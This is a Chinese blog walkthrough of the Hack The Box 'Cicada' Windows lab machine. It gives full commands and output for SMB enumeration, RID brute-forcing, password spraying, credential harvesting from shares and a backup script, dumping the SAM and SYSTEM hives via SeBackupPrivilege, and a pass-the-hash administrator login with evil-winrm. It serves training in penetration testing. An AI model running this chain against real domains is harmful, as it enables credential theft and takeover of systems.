首页 > 其他分享 >HTB-Cicada 靶机笔记

HTB-Cicada 靶机笔记

时间:2024-10-31 16:42:09浏览次数:1  
标签:HTB DC tcp CICADA 11.35 Cicada 445 10.10 靶机

Cicada 靶机笔记

概述

HTB 的靶机 Cicada 靶机

靶机地址:https://app.hackthebox.com/machines/Cicada

很有意思且简单的 windows 靶机,这台靶机多次利用了信息枚举,利用不同的信息一步一步获得 root 权限

一、nmap 扫描

1)端口扫描

-sT tcp 全连接扫描 --min-rate 以最低速率 10000 扫描 -p- 扫描全端口

nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54435/tcp open  unknown

处理端口

ports=$(grep open ports | awk -F/ '{print $1}' | paste -sd ,)

image-20241031155053584

2)详情探测

-sT tcp 全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描

nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,5443
5 -o details 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-09-29T15:08:00
|_  start_date: N/A

3) 漏洞脚本扫描

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

二、smb 枚举

1)smbclient

看到目标开放了 445 端口的 smb 服务,先对它进行匿名访问

smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

空密码,看到有共享信息暴露给我们。

只有 HR 磁盘有访问权限,进去看看有没有感兴趣的信息

smbclient  '\\10.10.11.35\HR'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.

smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 424297 blocks available

smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

看到一个名为 Notice from HR.txt 的文件

查看内容

cat Notice\ from\ HR.txt 
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

看上去是一封邮件,里面我们后的了一组密码凭证Cicada$M6Corpb*@Lp#nZp!8

不知道用户名,我们用crackmapexec枚举机器的用户名

2)crackmapexec

a)枚举用户名

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\dsad:
SMB         10.10.11.35     445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

从结果中过滤出SidTypeUser的信息来,就是机器的用户

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

b)爆破凭证

把用户放到user文件中,把密码放到pass文件中

crackmapexec smb 10.10.11.35  -u user -p pass --continue-on-success

image-20241031160845584

看到正确的smb凭证信息michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

看看它的共享权限

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --shares

image-20241031161320059

可以看到一个新的共享文件DEV,但这个账户并没有READ权限

同时这个账户也不支持winrm远程管理

image-20241031161135602

c)进一步枚举

利用已知的账户,枚举其他账户信息

crackmapexec smb 10.10.11.35  -u michael.wrightson -p pass --users

image-20241031161629043

发现了另一组凭证信息david.orelious:aRt$Lp#7t*VQ!3

看以他的smb权限

crackmapexec smb 10.10.11.35  -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

image-20241031161851479

看到这个用户对DEV文件有读权限

用smbclient把它下载下来

smbclient  '\\10.10.11.35\DEV' -U david.orelious   
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 423385 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

看到Backup_script.ps1,下载下来

cat Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

有发现了一组凭证emily.oscars:Q!3@Lp#M6b*7t*Vt

验证winrm权限

crackmapexec winrm 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162553666

看到是Pwn3d! 的状态,说明可以登录

三)获得立足点

1)evil-winrm

evil-winrm -i 10.10.11.35  -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

image-20241031162911104

拿到user flag

四)提权

看看当前用户权限

whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

看到当前用户有SeBackupPrivilegeSeRestorePrivilege权限,我们可以把sam,system转储出来,破解administrator的hash值,接着利用PTH进行哈希传递攻击,从而获取administrator权限

在c盘下创建一个temp目录

执行

reg save hklm\sam c:\temp\san
reg save hklm\system c:\temp\system

image-20241031163828705

看到转出出来的sam和system

downlaod sam
download system

将文件下载到本地

image-20241031164136779

破解sam

impacket-secretsdump -sam sam -system system local

image-20241031164216197

看到administrator的ntlmhash值2b87e7c93a3e8a0ea4a581937016f341

进行hash传递也就是PTH攻击

evil-winrm -i 10.10.11.35  -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

image-20241031164517084

成功拿到root权限

总结

通过nmap扫描发现目标开放了445 smb服务,对smb进行信息的枚举,发现了一个用户密码,进入获得了一组可以用来进行winrm远程管理的凭证,登陆进去发现用具有SeBackupPrivilege的权限,利用该权限转储hash值,进行PTH攻击,获得了管理员权限

标签:HTB,DC,tcp,CICADA,11.35,Cicada,445,10.10,靶机
From: https://www.cnblogs.com/LINGX5/p/18518267

相关文章

  • [ windows权限维持 ] 利用永恒之蓝(MS17-010)漏洞取靶机权限并创建后门账户
    ......
  • Tiki靶机练习
    Scan先arp-scan-l扫描附件主机ipnmap-sS-sV-n-T4-p-192.168.93.132StartingNmap7.94SVN(https://nmap.org)at2024-10-0320:25CSTNmapscanreportfor192.168.93.132Hostisup(0.0013slatency).Notshown:65531closedtcpports(reset)PORTSTAT......
  • Escalate_Linux靶机提权学习
    靶机下载https://www.vulnhub.com/entry/escalate_linux-1,323/用VMware打开扫描端口nmap-sS-sV-n-T4-p-192.168.93.134StartingNmap7.94SVN(https://nmap.org)at2024-10-0409:26CSTNmapscanreportfor192.168.93.134Hostisup(0.00090slatency).Not......
  • [ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程)
    ......
  • VulnHub-Brainpan1 靶机笔记
    Brainpan1靶机笔记概述靶机地址:https://vulnhub.com/entry/brainpan-1,51/#download这台靶机是很好的缓冲区溢出漏洞利用的练习靶机,涉及到逆向和缓冲区溢出漏洞挖掘的一些知识。一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oports192.168.11.12Nmapscanre......
  • HTB打靶记录-Infiltrator
    nmapscannmap-A10.10.11.31StartingNmap7.94SVN(https://nmap.org)at2024-10-1513:18CSTNmapscanreportforinfiltrator.htb(10.10.11.31)Hostisup(0.46slatency).Notshown:987filteredtcpports(no-response)PORTSTATESERVICE......
  • 红日靶机(五)笔记
    VulnStack5-红日靶机五概述这是红日靶场的第五个练习,本环境由两台靶机组成,其中web服务器是双网卡,即可以访问外网,又可以访问内网。而域控制器是不出网的。我们要通过win7进而拿下域控。主要练习Thinkphp的非强制路由导致的RCE,以及CS集成框架的使用包括横向移动、权限维持、痕迹清......
  • Vulhub Bob: 1.0.1靶机详解
    项目地址https://download.vulnhub.com/bob/Bob_v1.0.1.ova实验过程开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知Bob:1.0.1的一个ip地址为192.168.47.173扫描Bob:1.0.1的操作系统,端口及对应服务nmap-A-p-192.168.......
  • DC9靶机渗透全流程
    DC-9√192.168.40.169参考:https://blog.csdn.net/xiaocainiao2017/article/details/110749596https://www.cnblogs.com/Bitores/p/14759425.html1.nmapnmap-sP192.168.40.148/24nmap-A192.168.40.169-p0-65535照样还是22/ssh服务,80/http服务2.dirsearch扫目......
  • HTB打靶记录-Cicada
    NmapScannmap扫描一下ipnmap-sT-sV-O-Pn10.10.11.35Nmapscanreportfor10.10.11.35Hostisup(0.012slatency).Notshown:989filteredtcpports(no-response),1filteredtcpports(host-unreach)PORTSTATESERVICEVERSION25/tcpopensmtp?......